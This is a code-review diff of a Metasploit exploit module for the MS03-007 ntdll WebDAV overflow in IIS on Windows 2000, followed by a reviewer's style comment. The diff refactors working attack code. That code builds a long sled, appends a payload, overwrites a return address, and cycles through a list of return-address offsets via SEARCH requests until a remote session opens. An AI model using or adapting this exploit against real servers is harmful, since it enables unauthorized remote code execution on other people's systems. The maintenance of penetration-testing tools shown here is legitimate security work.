modules/exploits/windows/iis/ms03_007_ntdll_webdav.rb

```diff
@@ -61,125 +72,222 @@ def autofilter
+      "\x41\xcd", # Windows 2000 Server (SP0 DE / SP0 EN / SP0 ES / SP0 FR / SP0 IT / SP0 HU / SP0 NL / SP0 PT / SP0 TR)
+      "\x41\xce", # Windows 2000 Server (SP0 DE / SP0 EN / SP0 ES / SP0 FR / SP0 HU / SP0 IT / SP0 NL / SP0 PT / SP1 EN / SP1 SE / SP2 EN)
+      "\x41\xcf", # Windows 2000 Server (SP0 DE / SP0 ES / SP0 NL / SP0 TR / SP1 EN / SP1 SE / SP2 EN)
+    ]
 
     if datastore['InvalidSearchRequest']
-      xml = rand_text(rand(1024) + 32)
+      xml = rand_text(32..1056)
+    else
+      xml = "<?xml version=\"1.0\"?>\r\n"
+      xml << "<g:searchrequest xmlns:g=\"DAV:\">\r\n"
+      xml << "<g:sql>\r\n"
+      xml << "Select \"DAV:displayname\" from scope()\r\n"
+      xml << "</g:sql>\r\n"
+      xml << "</g:searchrequest>\r\n"
     end
 
     # The nop generator can be cpu-intensive for large buffers, so we use a static sled of 'A'
     # This decodes to "inc ecx"
+    url = 'A' * (65_516 - payload.encoded.length)
+    url << payload.encoded
 
-    url = 'A' * 65516
-    url[ url.length - payload.encoded.length, payload.encoded.length ] = payload.encoded
-
-    targets.each { |ret|
+    offsets = common_offsets.concat(server_offsets).concat(pro_offsets).uniq
 
-      print_status("Trying return address 0x%.8x..." % Rex::Text.to_unicode(ret).unpack('V')[0])
-      url[ 283, 2 ] = ret
+    offsets.each_with_index do |ret, index|
+      print_status("Trying return address #{format('0x%.8x', Rex::Text.to_unicode(ret).unpack('V*').first)} (#{index + 1} / #{offsets.length})...")
+      url[283, 2] = ret
 
       begin
         send_request_cgi({
-          'uri'     => '/' + url,
-          'ctype'   => 'text/xml',
-          'method'  => 'SEARCH',
-          'data'    => xml
+          'uri' => "/#{url}",
+          'ctype' => 'text/xml',
+          'method' => 'SEARCH',
+          'data' => xml
         }, 5)
-        handler
-      rescue => e
+      rescue StandardError => e
         print_error("Attempt failed: #{e}")
       end
 
-      1.upto(8) { |i|
-        select(nil,nil,nil,0.25)
-        return if self.session_created?
-      }
-
-      if !service_running?
-        print_error('Giving up, IIS must have completely crashed')
-        return
+      1.upto(8) do |_i|
+        select(nil, nil, nil, 0.25)
+        break if session_created?
       end
-    }
+
+      break if session_created?
+
+      fail_with(Failure::Unreachable, 'Giving up, IIS must have completely crashed') unless service_running?
+    end
   end
 
   # Try connecting to the server up to 20 times, with a two second gap
   # This gives the server time to recover after a failed exploit attempt
   def service_running?
     print_status('Checking if IIS is back up after a failed attempt...')
-    1.upto(20) {|i|
-      begin
-        send_request_raw({'uri' => '/'}, 5)
-      rescue
-        print_error("Connection failed (#{i} of 20)...")
-        select(nil,nil,nil,2)
-        next
-      end
-      return true
-    }
-    return false
+    1.upto(20) do |i|
```

Comment:
not a blocker: potentially swappable with `retry_until_truthy` with an explicit timeout option